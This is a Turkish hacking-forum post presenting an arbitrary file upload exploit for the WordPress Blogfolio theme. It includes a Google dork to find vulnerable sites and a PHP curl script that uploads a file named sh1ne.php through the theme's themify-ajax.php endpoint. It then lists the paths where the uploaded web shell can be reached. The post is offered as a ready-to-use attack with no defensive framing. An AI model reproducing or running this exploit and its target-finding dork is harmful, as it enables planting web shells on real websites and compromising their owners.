Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: WordPress Blogfolio Rasgele Dosya Yükleme Açığı
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,363 / 1,363
Deneyim: 52 / 100
Rep Sayısı: 2721
Mesaj Sayısı: 6195
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
WordPress Blogfolio Rasgele Dosya Yükleme Açığı
29.12.2014 19:32
Dork : inurl:wp-content/themes/blogfolio/

Kod:
<?php

$uploadfile="sh1ne.php";

$ch = curl_init("http://127.0.0.1/wp-content/themes/blogfolio/themify/themify-ajax.php?upload=1");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

        array('Filedata'=>"@$uploadfile"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

?>

Shelle Bağlanma Noktası ->

127.0.0.1/[SITEYOLU]/wp-content/themes/blogfolio/uploads/SHELLINIZ BURADA.php

yada

127.0.0.1/[SITEYOLU]/wp-content/uploads/[YIL]/[AY]/ > İŞTE SHELL NOKTASI
(Bu konu en son: 29.12.2014 Tarihinde, Saat: 19:34 düzenlenmiştir. Düzenleyen: KingSkrupellos.)
Alinti



1 Ziyaretçi
[-]
Sponsor Reklam